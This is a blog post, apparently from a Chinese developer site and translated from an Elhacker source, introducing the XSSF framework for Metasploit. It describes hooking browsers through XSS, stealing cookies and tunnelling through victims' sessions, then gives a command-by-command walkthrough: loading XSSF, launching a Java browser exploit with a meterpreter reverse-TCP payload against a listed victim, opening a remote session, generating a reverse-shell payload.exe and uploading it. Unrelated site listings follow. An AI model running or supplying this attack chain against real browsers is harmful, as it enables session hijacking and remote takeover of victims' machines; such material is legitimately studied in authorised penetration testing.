文档章节

XSSF - Cross Site Scripting Framework

Cnlouds
 Cnlouds
发布于 2014/06/19 23:12
字数 931
阅读 126
收藏 1

        跨站脚本框架 (XSSF) 是一个设计用来快速发现网站存在XSS漏洞的一个安全工具集。 该项目是为了验证网站存在的XSS漏洞及是被如何利用的。

        XSSF允许同目标浏览器(一个存在XSS漏洞的)创建通信通道来实施攻击。用户可以免费选择已经存在的攻击模块来对目标浏览器实施攻击。

        (英文太差,懒得翻译了,转成英文后大伙应该都能看懂。)
        Xssf Framework allows you to manage victims of XSS attacks and generic persists victims a connection with them through a "loop" in javascript, which is responsible for sending requests reverse at defined intervals of time in order to execute exploits against the victim.

        

        To use xssf in metasploit is necessary to locate a vulnerable application to XSS attacks, to test and improve skills in the field of web application security, there is a project called DVWA (Damn Vulnerable Web Application) is an application written in PHP MySQL and has enabled a number of vulnerabilities that allows a security professional, interact with the application and understanding of possible attacks that can be done in web applications.


        XSSF documented provides a powerful API, which facilitates the development of modules and attacks. In addition, their integration into the Metasploit Framework allows users to start the MSF browser based exploit easilly XSS vulnerability.

        Exploiting a XSS bug in the victim's browser could be to browse website on attacker's browser, using the victim's session connected. In most cases, simply stealing the victim cookie will be sufficient to do this.

        However, in a few cases (intranet, network tools portals, etc.), the cookie will not be useful for an external attacker. That's why XSSF Tunnel was created to help the attacker to help the attacker browsing on affected domain using the victim's session.

        With XSS we can create a tunnel that will allow us to connect our victim from a web browser, the basic idea was to create a tunnel to serve as a proxy for communication between the application XSS vulnerability exploited and the attacker passed between the victim, in this way you can run some additional attack without revealing the identity of the attacker and using the identity of the victim.

        The new version 4.6.0-dev MSF is supported by:

    • Backtrack 5R3

    • Ubuntu 12.04

    • Kali 1.0 

    • Windows 7 

    Vulnerabilidades XSS (Cross Site Scripting )

    • Cross Site Scripting InDirecto (Reflejado) Reflective XSS

    • Cross Site Scripting  Directo (Persistente) 

    Manual con ejemplos "XSS for fun and profit"

        It allows: 

           stealing Cookies

            Execute commands (via Javascript)

            Execute attacks Denial of Service (DDoS)

    XSSF con Metasploit

    msfupdate 
      
    cd /opt/metasploit/apps/pro/msf3 
      
    svn export http:/xssf.googlecode.com/svn/trunk ./ --force 
      
    msfconsole
    msf > load xssf Port=80
    msf > help xssf

    Result of the available commands:

    • xssf_active_victims Muestra víctimas activas.

    • xssf_add_auto_attack Añade un nuevo ataque automatizado (lanzado de forma automática en la conexión de la víctima).

    • xssf_auto_attacks Muestra XSSF ataques automatizados.

    • xssf_banner Prints Marco XSS bandera !

    • xssf_clean_victims Limpia víctimas en la base de datos ( eliminar ataques de espera).

    • xssf_exploit Lanza e introduce un módulo (que se ejecuta en uno de sus procesos ) en una víctima determinada.

    • xssf_information Muestra información sobre una víctima determinada.

    • xssf_log Muestra registro con un ID dado.

    • xssf_logs Muestra los registros sobre una víctima determinada.

    • xssf_remove_auto_attack Elimina un ataque automatizado.

    • xssf_remove_victims Elimina las víctimas en la base de datos.

    • xssf_restore_state Restaura el estado XSSF (víctimas , registros , etc) a partir del archivo de entrada.

    • xssf_save_state Guarda estatales XSSF (víctimas , registros , etc) en el archivo de salida.

    • xssf_servers Muestra todos los servidores de ataque utilizados.

    • xssf_tunnel Nos proporciona un túnel entre agresor y víctima.

    • xssf_urls Enumera las direcciones URL's disponibles útiles proporcionadas por XSSF.

    • xssf_victims Muestra todas las víctimas 

    Example of a victim using Internet Explorer 7 and a vulnerable version of Java in Windows XP.

    xssf_victims

        1 1 192.168.0.12 true 5 Internet Explorer 7.0 YES

    xssf_information 1

            [..] 
            BROWSER NAME : Internet Explorer
            BROWSER VERSION : 7.0
            OS NAME : Windows
            OS VERSION : XP
            ARCHITECTURE : ARCH_X86 
            [..]
            

    use exploit/multi/browser/java_atomicreferencearray    
    set PAYLOAD java/meterpreter/reverse_tcp
    set SRVHOST 192.168.23.200
    set URIPATH xssf
    set LHOST 192.168.23.200
    exploit -j
    jobs

        Jobs
        ====
        Id Name
        – —-
        0 Exploit: multi/browser/java_atomicreferencearray
        

    xssf_exploit 1 0

        [*] Searching Metasploit launched module with JobID = ’0′…
        [+] A running exploit exists: ‘Exploit: multi/browser/java_atomicreferencearray’
        [*] Exploit execution started, press [CTRL + C] to stop it !
        [+] Remaining victims to attack: [[1] (1)]
        [+] Code ‘Exploit: multi/browser/java_atomicreferencearray’ sent to victim ’1′
        [+] Remaining victims to attack: NONE

        

    show sessions

        Active sessions
        ===============
        Id Type Information Connection
        – —- ———– ———-
        1 meterpreter java/java victime @ Victim-PC 192.168.23.200:4444 -> 192.168.23.12:3128 (192.168.23.12)

    ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.23.200 LPORT=5555 X > payload.exe
    use exploit/multi/handler
    exploit -j
    upload /opt/metasploit/apps/pro/msf3/payload.exe c
    background
    sessions -i 1

    PS:写文章不易呀,翻译也挺苦逼,虽然是翻译成英文,真心敬仰那些翻译大神!

    via:Elhacker



© 著作权归作者所有

Cnlouds
粉丝 13
博文 95
码字总数 56136
作品 0
海淀
程序员
私信 提问
WordPress 5.0.1 安全更新版本发布,建议升级

WordPress 5.0.1 现已推出。 这是自 WordPress 3.7 以来所有版本的安全版本。强烈建议用户立刻进行更新。此外,还鼓励插件作者阅读 5.0.1 版本的开发者说明,以获取有关向后兼容的信息。 Wo...

局长
2018/12/15
1K
0
项目推荐:Cross-site scripting (XSS) cheat sheet

作者:Gareth Heyes 项目名称:Cross-site scripting (XSS) cheat sheet 项目地址:https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 此跨站脚本(XSS)速查表包含许......

Gareth Heyes
2019/11/15
0
0
Pentest-bookmarks v1.5

Bookmarks Bookmarks Menu Recently Bookmarked Recent Tags Mozilla Firefox Help and Tutorials Customize Firefox Get Involved About Us Recently Bookmarked Recent Tags Mozilla Firef......

千域千寻
2014/10/22
643
0
跨站脚本-xss

跨站脚本[编辑] 维基百科,自由的百科全书 中国大陆 跨站脚本 港台 跨网站指令码 本条目可参照英语维基百科的相应条目来扩充。 若您熟悉来源语言和主题,请协助参考外语维基扩充条目。请勿直...

Oscarfff
2016/08/01
22
0
w3af_console----渗透扫描

has two user interfaces, the console user interface and the graphical user interface. This user guide will focus on the console user interface where it’s easier to explain the......

HarvinY
2016/09/07
129
0

没有更多内容

加载失败,请刷新页面

加载更多

How to find table in a database with HeidiSQL

In this article I want to show you how you can find table by name with HeidiSQL. Find table by typing One of the options to find table is to having focus in the object explorer ......

Ciet
10分钟前
4
0
基于SWIG跨平台开发的C++编码规范

1、数组定义 使用数组不建议采用指针方式eg double *,或者 double test[4] 直接采用std::vector或list即可。对于固定长度的数组定义为一个结构体 double test[4]instead ofstruct Vec...

洋碱
12分钟前
2
0
用Markdown编程之布局

基本就是用Markdown的布局方式。 \:是转义符号,最高优先级。 行首+# :用于空间布局,1-6分别标明:模式根、子模式、子模式内。 行首+> :用于标注和通信,1个标明标注,2个标明分类,3个标...

dwcz
19分钟前
3
0
SpringBoot定时器多线程解决方案

@Scheduled 作用:spring定时器(定时执行一次或定时轮询执行一段代码) 使用场景:注解在方法上 参数说明:常用参数 @Scheduled 参数说明 String cron:cron表达式定义了方法执行的时间规则(网...

whoisliang
19分钟前
4
0
3.01、Spring AOP的理解

注:转 https://mp.weixin.qq.com/s/PsgTLn8cdTxdd542XgVkUA 什么是AOP AOP(Aspect-Oriented Programming), 即 面向切面编程 , 它与 OOP( Object-Oriented Programming, 面向对象编程) 相辅相......

追忆2025
25分钟前
3
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部